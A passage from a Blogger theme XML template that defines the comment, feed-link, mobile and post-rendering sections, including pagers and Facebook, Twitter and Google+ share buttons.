2879 <span class='comment-timestamp'><data:post.timestampLabel/> <data:backlink.timestamp/></span>
2880 </dd>
2881 </div>
2882 </b:loop>
2883 </dl>
2884 </b:if>
2885 <p class='comment-footer'>
2886 <a class='comment-link' expr:href='data:post.createLinkUrl' expr:id='data:widget.instanceId + "_backlinks-create-link"' target='_blank'><data:post.createLinkLabel/></a>
2887 </p>
2888</b:includable>
2889 <b:includable id='comment-form' var='post'>
2890 <div class='comment-form'>
2891 <a name='comment-form'/>
2892 <b:if cond='data:mobile'>
2893 <h4 id='comment-post-message'>
2894 <a expr:id='data:widget.instanceId + "_comment-editor-toggle-link"' href='javascript:void(0)'><data:postCommentMsg/></a></h4>
2895 <p><data:blogCommentMessage/></p>
2896 <data:blogTeamBlogMessage/>
2897 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
2898 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/>
2899 <b:else/>
2900 <h4 id='comment-post-message'><data:postCommentMsg/></h4>
2901 <p><data:blogCommentMessage/></p>
2902 <data:blogTeamBlogMessage/>
2903 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
2904 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
2905 </b:if>
2906 <data:post.cmtfpIframe/>
2907 <script type='text/javascript'>
2908 BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
2909 </script>
2910 </div>
2911</b:includable>
2912 <b:includable id='commentDeleteIcon' var='comment'>
2913 <span expr:class='"item-control " + data:comment.adminClass'>
2914 <b:if cond='data:showCmtPopup'>
2915 <div class='goog-toggle-button'>
2916 <div class='goog-inline-block comment-action-icon'/>
2917 </div>
2918 <b:else/>
2919 <a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:top.deleteCommentMsg'>
2920 <img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
2921 </a>
2922 </b:if>
2923 </span>
2924</b:includable>
2925 <b:includable id='comment_count_picker' var='post'>
2926 <b:if cond='data:post.commentSource == 1'>
2927 <span class='cmt_count_iframe_holder' expr:data-count='data:post.numComments' expr:data-onclick='data:post.addCommentOnclick' expr:data-post-url='data:post.url' expr:data-url='data:post.url.canonical.http'>
2928 </span>
2929 <b:else/>
2930 <a class='comment-link' expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'>
2931 <data:post.commentLabelFull/>:
2932 </a>
2933 </b:if>
2934</b:includable>
2935 <b:includable id='comment_picker' var='post'>
2936 <b:if cond='data:post.commentSource == 1'>
2937 <b:include data='post' name='iframe_comments'/>
2938 <b:elseif cond='data:post.showThreadedComments'/>
2939 <b:include data='post' name='threaded_comments'/>
2940 <b:else/>
2941 <b:include data='post' name='comments'/>
2942 </b:if>
2943</b:includable>
2944 <b:includable id='comments' var='post'>
2945 <div class='comments' id='comments'>
2946 <a name='comments'/>
2947 <b:if cond='data:post.allowComments'>
2948 <h4><data:post.commentLabelFull/>:</h4>
2949
2950 <b:if cond='data:post.commentPagingRequired'>
2951 <span class='paging-control-container'>
2952 <b:if cond='data:post.hasOlderLinks'>
2953 <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'><data:post.oldestLinkText/></a>
2954  
2955 <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'><data:post.olderLinkText/></a>
2956  
2957 </b:if>
2958
2959 <data:post.commentRangeText/>
2960
2961 <b:if cond='data:post.hasNewerLinks'>
2962  
2963 <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'><data:post.newerLinkText/></a>
2964  
2965 <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'><data:post.newestLinkText/></a>
2966 </b:if>
2967 </span>
2968 </b:if>
2969
2970 <div expr:id='data:widget.instanceId + "_comments-block-wrapper"'>
2971 <dl expr:class='data:post.avatarIndentClass' id='comments-block'>
2972 <b:loop values='data:post.comments' var='comment'>
2973 <dt expr:class='"comment-author " + data:comment.authorClass' expr:id='data:comment.anchorName'>
2974 <b:if cond='data:comment.favicon'>
2975 <img expr:src='data:comment.favicon' height='16px' style='margin-bottom:-2px;' width='16px'/>
2976 </b:if>
2977 <a expr:name='data:comment.anchorName'/>
2978 <b:if cond='data:blog.enabledCommentProfileImages'>
2979 <data:comment.authorAvatarImage/>
2980 </b:if>
2981 <b:if cond='data:comment.authorUrl'>
2982 <a expr:href='data:comment.authorUrl' rel='nofollow'><data:comment.author/></a>
2983 <b:else/>
2984 <data:comment.author/>
2985 </b:if>
2986 <data:commentPostedByMsg/>
2987 </dt>
2988 <dd class='comment-body' expr:id='data:widget.instanceId + data:comment.cmtBodyIdPostfix'>
2989 <b:if cond='data:comment.isDeleted'>
2990 <span class='deleted-comment'><data:comment.body/></span>
2991 <b:else/>
2992 <p>
2993 <data:comment.body/>
2994 </p>
2995 </b:if>
2996 </dd>
2997 <dd class='comment-footer'>
2998 <span class='comment-timestamp'>
2999 <a expr:href='data:comment.url' title='comment permalink'>
3000 <data:comment.timestamp/>
3001 </a>
3002 <b:include data='comment' name='commentDeleteIcon'/>
3003 </span>
3004 </dd>
3005 </b:loop>
3006 </dl>
3007 </div>
3008
3009 <b:if cond='data:post.commentPagingRequired'>
3010 <span class='paging-control-container'>
3011 <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>
3012 <data:post.oldestLinkText/>
3013 </a>
3014 <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>
3015 <data:post.olderLinkText/>
3016 </a>
3017  
3018 <data:post.commentRangeText/>
3019  
3020 <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>
3021 <data:post.newerLinkText/>
3022 </a>
3023 <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>
3024 <data:post.newestLinkText/>
3025 </a>
3026 </span>
3027 </b:if>
3028
3029 <p class='comment-footer'>
3030 <b:if cond='data:post.embedCommentForm'>
3031 <b:if cond='data:post.allowNewComments'>
3032 <b:include data='post' name='comment-form'/>
3033 <b:else/>
3034 <data:post.noNewCommentsText/>
3035 </b:if>
3036 <b:elseif cond='data:post.allowComments'/>
3037 <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>
3038 </b:if>
3039 </p>
3040 </b:if>
3041 <b:if cond='data:showCmtPopup'>
3042 <div id='comment-popup'>
3043 <iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
3044 </iframe>
3045 </div>
3046 </b:if>
3047
3048 <div id='backlinks-container'>
3049 <div expr:id='data:widget.instanceId + "_backlinks-container"'>
3050 <b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>
3051 </div>
3052 </div>
3053 </div>
3054</b:includable>
3055 <b:includable id='feedLinks'>
3056 <b:if cond='data:blog.pageType != "item"'> <!-- Blog feed links -->
3057 <b:if cond='data:feedLinks'>
3058 <div class='blog-feeds'>
3059 </div>
3060 </b:if>
3061
3062 <b:else/> <!--Post feed links -->
3063 <div class='post-feeds'>
3064 <b:loop values='data:posts' var='post'>
3065 <b:include cond='data:post.allowComments and data:post.feedLinks' data='post.feedLinks' name='feedLinksBody'/>
3066 </b:loop>
3067 </div>
3068 </b:if>
3069</b:includable>
3070 <b:includable id='feedLinksBody' var='links'>
3071 <div class='feed-links'>
3072 <data:feedLinksMsg/>
3073 <b:loop values='data:links' var='f'>
3074 <a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType' target='_blank'><data:f.name/> (<data:f.feedType/>)</a>
3075 </b:loop>
3076 </div>
3077</b:includable>
3078 <b:includable id='iframe_comments' var='post'>
3079
3080 <b:if cond='data:post.allowIframeComments'>
3081 <script expr:src='data:post.iframeCommentSrc' type='text/javascript'/>
3082 <div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/>
3083
3084 <b:if cond='data:post.embedCommentForm == "false"'>
3085 <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>
3086 </b:if>
3087 </b:if>
3088</b:includable>
3089 <b:includable id='mobile-index-post' var='post'>
3090 <div class='mobile-date-outer date-outer'>
3091 <b:if cond='data:post.dateHeader'>
3092 <div class='date-header'>
3093 <span><data:post.dateHeader/></span>
3094 </div>
3095 </b:if>
3096
3097 <div class='mobile-post-outer'>
3098 <a expr:href='data:post.url'>
3099 <h3 class='mobile-index-title entry-title' itemprop='name'>
3100 <data:post.title/>
3101 </h3>
3102
3103 <div class='mobile-index-arrow'>&rsaquo;</div>
3104
3105 <div class='mobile-index-contents'>
3106 <b:if cond='data:post.thumbnailUrl'>
3107 <div class='mobile-index-thumbnail'>
3108 <div class='Image'>
3109 <img expr:src='data:post.thumbnailUrl'/>
3110 </div>
3111 </div>
3112 </b:if>
3113
3114 <div class='post-body'>
3115 <b:if cond='data:post.snippet'><data:post.snippet/></b:if>
3116 </div>
3117 </div>
3118
3119 <div style='clear: both;'/>
3120 </a>
3121
3122 <div class='mobile-index-comment'>
3123 <b:include cond='data:blog.pageType != "static_page" and data:post.allowComments and data:post.numComments != 0' data='post' name='comment_count_picker'/>
3124 </div>
3125 </div>
3126 </div>
3127</b:includable>
3128 <b:includable id='mobile-main' var='top'>
3129 <!-- posts -->
3130 <div class='blog-posts hfeed'>
3131
3132 <b:include data='top' name='status-message'/>
3133
3134 <b:if cond='data:blog.pageType == "index"'>
3135 <b:loop values='data:posts' var='post'>
3136 <b:include data='post' name='mobile-index-post'/>
3137 </b:loop>
3138 <b:else/>
3139 <b:loop values='data:posts' var='post'>
3140 <b:include data='post' name='mobile-post'/>
3141 </b:loop>
3142 </b:if>
3143 </div>
3144
3145 <b:include name='mobile-nextprev'/>
3146</b:includable>
3147 <b:includable id='mobile-nextprev'>
3148 <div class='blog-pager' id='blog-pager'>
3149 <b:if cond='data:newerPageUrl'>
3150 <div class='mobile-link-button' id='blog-pager-newer-link'>
3151 <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' expr:title='data:newerPageTitle'>&lsaquo;</a>
3152 </div>
3153 </b:if>
3154
3155 <b:if cond='data:olderPageUrl'>
3156 <div class='mobile-link-button' id='blog-pager-older-link'>
3157 <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:olderPageTitle'>&rsaquo;</a>
3158 </div>
3159 </b:if>
3160
3161 <div class='mobile-link-button' id='blog-pager-home-link'>
3162 <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
3163 </div>
3164
3165 <div class='mobile-desktop-link'>
3166 <a class='home-link' expr:href='data:desktopLinkUrl'><data:desktopLinkMsg/></a>
3167 </div>
3168
3169 </div>
3170 <div class='clear'/>
3171</b:includable>
3172 <b:includable id='mobile-post' var='post'>
3173 <div class='date-outer'>
3174 <b:if cond='data:post.dateHeader'>
3175 <h2 class='date-header'><span><data:post.dateHeader/></span></h2>
3176 </b:if>
3177 <div class='date-posts'>
3178 <div class='post-outer'>
3179
3180 <div class='post hentry uncustomized-post-template' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
3181 <b:if cond='data:post.thumbnailUrl'>
3182 <meta expr:content='data:post.thumbnailUrl' itemprop='image_url'/>
3183 </b:if>
3184 <meta expr:content='data:blog.blogId' itemprop='blogId'/>
3185 <meta expr:content='data:post.id' itemprop='postId'/>
3186
3187 <a expr:name='data:post.id'/>
3188 <b:if cond='data:post.title'>
3189 <b:if cond='data:blog.pageType == "index"'>
3190 <h2 class='post-title entry-title' itemprop='name'>
3191 <b:if cond='data:post.link'>
3192 <a expr:href='data:post.link' itemprop='url'><data:post.title/></a>
3193 <b:else/>
3194 <b:if cond='data:post.url'>
3195<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>
3196<b:else/>
3197 <data:post.title/>
3198 </b:if>
3199 </b:if>
3200 </h2>
3201 <b:elseif cond='data:blog.pageType == "archive"'/>
3202<h2 class='post-title entry-title' itemprop='name'>
3203 <b:if cond='data:post.link'>
3204 <a expr:href='data:post.link' itemprop='url'><data:post.title/></a>
3205 <b:else/>
3206 <b:if cond='data:post.url'>
3207<a expr:href='data:post.url' itemprop='url'><data:post.title/></a>
3208<b:else/>
3209 <data:post.title/>
3210 </b:if>
3211 </b:if>
3212 </h2>
3213<b:else/>
3214<h1 class='post-title entry-title' itemprop='name'>
3215 <b:if cond='data:post.link'>
3216 <data:post.title/>
3217 <b:else/>
3218 <b:if cond='data:post.url'>
3219 <data:post.title/>
3220<b:else/>
3221 <data:post.title/>
3222 </b:if>
3223 </b:if>
3224 </h1>
3225</b:if>
3226 </b:if>
3227
3228 <div class='post-header'>
3229 <div class='post-header-line-1'/>
3230 </div>
3231
3232 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
3233 <data:post.body/>
3234 <div style='clear: both;'/> <!-- clear for photos floats -->
3235 </div>
3236
3237 <div class='post-footer'>
3238 <div class='post-footer-line post-footer-line-1'>
3239 <span class='post-author vcard'>
3240 <b:if cond='data:top.showAuthor'>
3241 <b:if cond='data:post.authorProfileUrl'>
3242 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3243 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
3244 <a expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>
3245 <span itemprop='name'><data:post.author/></span>
3246 </a>
3247 </span>
3248 <b:else/>
3249 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3250 <span itemprop='name'><data:post.author/></span>
3251 </span>
3252 </b:if>
3253 </b:if>
3254 </span>
3255
3256 <span class='post-timestamp'>
3257 <b:if cond='data:top.showTimestamp'>
3258 <data:top.timestampLabel/>
3259 <b:if cond='data:post.url'>
3260 <meta expr:content='data:post.canonicalUrl' itemprop='url'/>
3261 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published' expr:title='data:post.timestampISO8601' itemprop='datePublished'><data:post.timestamp/></abbr></a>
3262 </b:if>
3263 </b:if>
3264 </span>
3265
3266 <span class='post-comment-link'>
3267 <b:include cond='data:blog.pageType not in {"item","static_page"} and data:post.allowComments' data='post' name='comment_count_picker'/>
3268 </span>
3269 </div>
3270
3271 <div class='post-footer-line post-footer-line-2'>
3272 <b:if cond='data:top.showMobileShare'>
3273 <div class='mobile-link-button goog-inline-block' id='mobile-share-button'>
3274 <a href='javascript:void(0);'><data:shareMsg/></a>
3275 </div>
3276 </b:if>
3277 <b:if cond='data:top.showDummy'>
3278 <div class='goog-inline-block dummy-container'><data:post.dummyTag/></div>
3279 </b:if>
3280 </div>
3281
3282 </div>
3283 </div>
3284
3285 <b:include cond='data:blog.pageType in {"static_page","item"}' data='post' name='comment_picker'/>
3286 </div>
3287 </div>
3288 </div>
3289</b:includable>
3290 <b:includable id='nextprev'>
3291 <div class='blog-pager' id='blog-pager'>
3292 <b:if cond='data:newerPageUrl'>
3293 <span id='blog-pager-newer-link'>
3294 <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' expr:title='data:newerPageTitle'><data:newerPageTitle/></a>
3295 </span>
3296 </b:if>
3297
3298 <b:if cond='data:olderPageUrl'>
3299 <span id='blog-pager-older-link'>
3300 <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:olderPageTitle'><data:olderPageTitle/></a>
3301 </span>
3302 </b:if>
3303
3304 <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
3305
3306 <b:if cond='data:mobileLinkUrl'>
3307 <div class='blog-mobile-link'>
3308 <a expr:href='data:mobileLinkUrl'><data:mobileLinkMsg/></a>
3309 </div>
3310 </b:if>
3311
3312 </div>
3313 <div class='clear'/>
3314</b:includable>
3315 <b:includable id='post' var='post'>
3316 <div class='post hentry'>
3317 <b:if cond='data:blog.pageType == "index"'>
3318 <b:if cond='data:post.thumbnailUrl'>
3319 <div class='block-image'>
3320<span class='post-labels'>
3321 <b:if cond='data:post.labels'>
3322
3323 <b:loop values='data:post.labels' var='label'>
3324 <b:if cond='data:label.isLast == "true"'>
3325 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3326 </b:if>
3327 </b:loop>
3328 </b:if>
3329 </span>
3330<div class='thumb'>
3331 <a href='<data:post.url/>' style='background:url(<data:post.thumbnailUrl/>) no-repeat center center;background-size:cover'></a>
3332 </div>
3333<div class='meta-botom'>
3334 <div class='share-art'>
3335<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3336
3337<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3338
3339<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3340
3341
3342
3343</div>
3344
3345 </div>
3346</div>
3347 <b:else/>
3348 <b:if cond='data:post.firstImageUrl'>
3349 <div class='block-image'>
3350<span class='post-labels'>
3351 <b:if cond='data:post.labels'>
3352
3353 <b:loop values='data:post.labels' var='label'>
3354 <b:if cond='data:label.isLast == "true"'>
3355 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3356 </b:if>
3357 </b:loop>
3358 </b:if>
3359 </span>
3360<div class='thumb'>
3361 <a href='<data:post.url/>' style='background:url(<data:post.firstImageUrl/>) no-repeat center center;background-size:cover'></a>
3362 </div>
3363<div class='meta-botom'>
3364 <div class='share-art'>
3365<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3366
3367<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3368
3369<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3370
3371
3372
3373</div>
3374
3375 </div>
3376</div>
3377 <b:else/>
3378 <div class='block-image'>
3379<span class='post-labels'>
3380 <b:if cond='data:post.labels'>
3381
3382 <b:loop values='data:post.labels' var='label'>
3383 <b:if cond='data:label.isLast == "true"'>
3384 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3385 </b:if>
3386 </b:loop>
3387 </b:if>
3388 </span>
3389<div class='thumb'>
3390 <a href='<data:post.url/>' style='background:url(http://2.bp.blogspot.com/-IO-XEI1LgEs/VmPNKFp0BhI/AAAAAAAACOg/_JrYHMBXV5w/s1600-r/nothumb.jpg) no-repeat center center;background-size:cover'></a>
3391 </div>
3392<div class='meta-botom'>
3393 <div class='share-art'>
3394<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3395
3396<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3397
3398<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3399
3400
3401
3402</div>
3403
3404 </div>
3405</div>
3406 </b:if></b:if>
3407 </b:if>
3408 <b:if cond='data:blog.pageType == "archive"'>
3409 <b:if cond='data:post.thumbnailUrl'>
3410 <div class='block-image'>
3411<span class='post-labels'>
3412 <b:if cond='data:post.labels'>
3413
3414 <b:loop values='data:post.labels' var='label'>
3415 <b:if cond='data:label.isLast == "true"'>
3416 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3417 </b:if>
3418 </b:loop>
3419 </b:if>
3420 </span>
3421<div class='thumb'>
3422 <a href='<data:post.url/>' style='background:url(<data:post.thumbnailUrl/>) no-repeat center center;background-size:cover'></a>
3423 </div>
3424<div class='meta-botom'>
3425 <div class='share-art'>
3426<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3427
3428<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3429
3430<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3431
3432
3433
3434</div>
3435
3436 </div>
3437</div>
3438 <b:else/>
3439 <b:if cond='data:post.firstImageUrl'>
3440 <div class='block-image'>
3441<span class='post-labels'>
3442 <b:if cond='data:post.labels'>
3443 <b:loop values='data:post.labels' var='label'>
3444 <b:if cond='data:label.isLast == "true"'>
3445 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3446 </b:if>
3447 </b:loop>
3448 </b:if>
3449 </span>
3450<div class='thumb'>
3451 <a href='<data:post.url/>' style='background:url(<data:post.firstImageUrl/>) no-repeat center center;background-size:cover'></a>
3452 </div>
3453<div class='meta-botom'>
3454 <div class='share-art'>
3455<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3456
3457<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3458
3459<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3460
3461
3462
3463</div>
3464
3465 </div>
3466</div>
3467 <b:else/>
3468 <div class='block-image'>
3469<span class='post-labels'>
3470 <b:if cond='data:post.labels'>
3471 <b:loop values='data:post.labels' var='label'>
3472 <b:if cond='data:label.isLast == "true"'>
3473 <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
3474 </b:if>
3475 </b:loop>
3476 </b:if>
3477 </span>
3478<div class='thumb'>
3479 <a href='<data:post.url/>' style='background:url(http://2.bp.blogspot.com/-IO-XEI1LgEs/VmPNKFp0BhI/AAAAAAAACOg/_JrYHMBXV5w/s1600-r/nothumb.jpg) no-repeat center center;background-size:cover'></a>
3480 </div>
3481<div class='meta-botom'>
3482 <div class='share-art'>
3483<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook-square'/><span class='resp_del'> Facebook</span></a>
3484
3485<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter-square'/><span class='resp_del2'> Twitter</span></a>
3486
3487<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus-square'/><span class='resp_del3'> Google+</span></a>
3488
3489
3490
3491</div>
3492
3493 </div>
3494</div>
3495 </b:if></b:if>
3496 </b:if>
3497 <b:if cond='data:blog.pageType == "item"'>
3498 <div itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'>
3499 <meta expr:content='data:post.firstImageUrl' itemprop='image'/>
3500 </b:if>
3501 <div class='post-header'>
3502 <b:if cond='data:blog.pageType == "item"'>
3503 <b:if cond='data:post.title'>
3504 <div class='post-head'><h1 class='post-title entry-title' itemprop='name headline'>
3505 <b:if cond='data:post.link'>
3506 <a expr:href='data:post.link'><data:post.title/></a>
3507 <b:else/>
3508 <b:if cond='data:post.url'>
3509 <b:if cond='data:blog.url != data:post.url'>
3510 <a expr:href='data:post.url'><data:post.title/></a>
3511 <b:else/>
3512 <data:post.title/>
3513 </b:if>
3514 <b:else/>
3515 <data:post.title/>
3516 </b:if>
3517 </b:if>
3518 </h1></div>
3519 </b:if>
3520 <div class='post-meta'>
3521<span class='post-author vcard'>
3522 <b:if cond='data:top.showAuthor'>
3523 <i>by</i>
3524 <b:if cond='data:post.authorProfileUrl'>
3525 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3526 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
3527 <a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author' rel='author'>
3528 <span itemprop='name'><data:post.author/></span>
3529 </a>
3530 </span>
3531 <b:else/>
3532 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3533 <a class='g-profile' expr:href='data:post.authorProfileUrl' expr:title='data:post.author' rel='author'>
3534 <span itemprop='name'><data:post.author/></span></a>
3535 </span>
3536 </b:if>
3537 </b:if>
3538 </span>
3539 <span class='post-timestamp'>
3540 <b:if cond='data:top.showTimestamp'>
3541 <i>on</i>
3542 <b:if cond='data:post.url'>
3543 <meta expr:content='data:post.canonicalUrl' itemprop='url'/>
3544 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published timeago' expr:title='data:post.timestampISO8601' itemprop='datePublished'><data:post.timestamp/></abbr></a>
3545 </b:if>
3546 </b:if>
3547 </span>
3548<span class='label-head'>
3549 <b:if cond='data:post.labels'>
3550 <i>in</i>
3551 <b:loop values='data:post.labels' var='label'>
3552 <a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='data:label.isLast != "true"'>,</b:if>
3553 </b:loop>
3554 </b:if>
3555 </span>
3556 </div>
3557 </b:if>
3558 <b:if cond='data:blog.pageType == "static_page"'>
3559 <b:if cond='data:post.title'>
3560 <div class='post-head'><h1 class='post-title entry-title' itemprop='name'>
3561 <b:if cond='data:post.link'>
3562 <a expr:href='data:post.link'><data:post.title/></a>
3563 <b:else/>
3564 <b:if cond='data:post.url'>
3565 <b:if cond='data:blog.url != data:post.url'>
3566 <a expr:href='data:post.url'><data:post.title/></a>
3567 <b:else/>
3568 <data:post.title/>
3569 </b:if>
3570 <b:else/>
3571 <data:post.title/>
3572 </b:if>
3573 </b:if>
3574 </h1></div>
3575 </b:if>
3576 </b:if>
3577
3578 </div>
3579
3580 <!-- Then use the post body as the schema.org description, for good G+/FB snippeting. -->
3581 <article>
3582 <b:if cond='data:blog.pageType != "item"'>
3583 <b:if cond='data:blog.pageType != "static_page"'>
3584 <b:if cond='data:post.title'>
3585 <font class='retitle'>
3586 <h2 class='post-title entry-title'>
3587 <b:if cond='data:post.link'>
3588 <a expr:href='data:post.link'>
3589 <data:post.title/>
3590 </a>
3591 <b:else/>
3592 <b:if cond='data:post.url'>
3593 <a expr:href='data:post.url'>
3594 <data:post.title/>
3595 </a>
3596 <b:else/>
3597 <data:post.title/>
3598 </b:if>
3599 </b:if>
3600 </h2>
3601 </font>
3602 </b:if>
3603 <div class='date-header-post'>
